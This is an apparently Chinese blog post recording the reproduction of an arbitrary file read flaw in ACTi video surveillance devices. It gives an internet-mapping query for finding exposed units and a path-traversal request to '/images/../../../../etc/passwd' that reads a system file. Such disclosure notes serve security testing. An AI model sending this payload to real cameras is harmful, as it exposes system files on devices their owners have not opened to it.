ACTI-DVR 文件读取漏洞

ACTI 视频监控 images 任意文件读取漏洞

漏洞描述

ACTI 视频监控存在任意文件读取漏洞

漏洞影响

ACTI摄像头

网络测绘

app="ACTi-视频监控"

漏洞复现

登录页面如下

文件读取路径：

/images/../../../../../../../../etc/passwd

Burp抓包

暴露出信息。

End!!!

posted @ 2022-05-20 14:41 我就去睡觉阅读(367) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部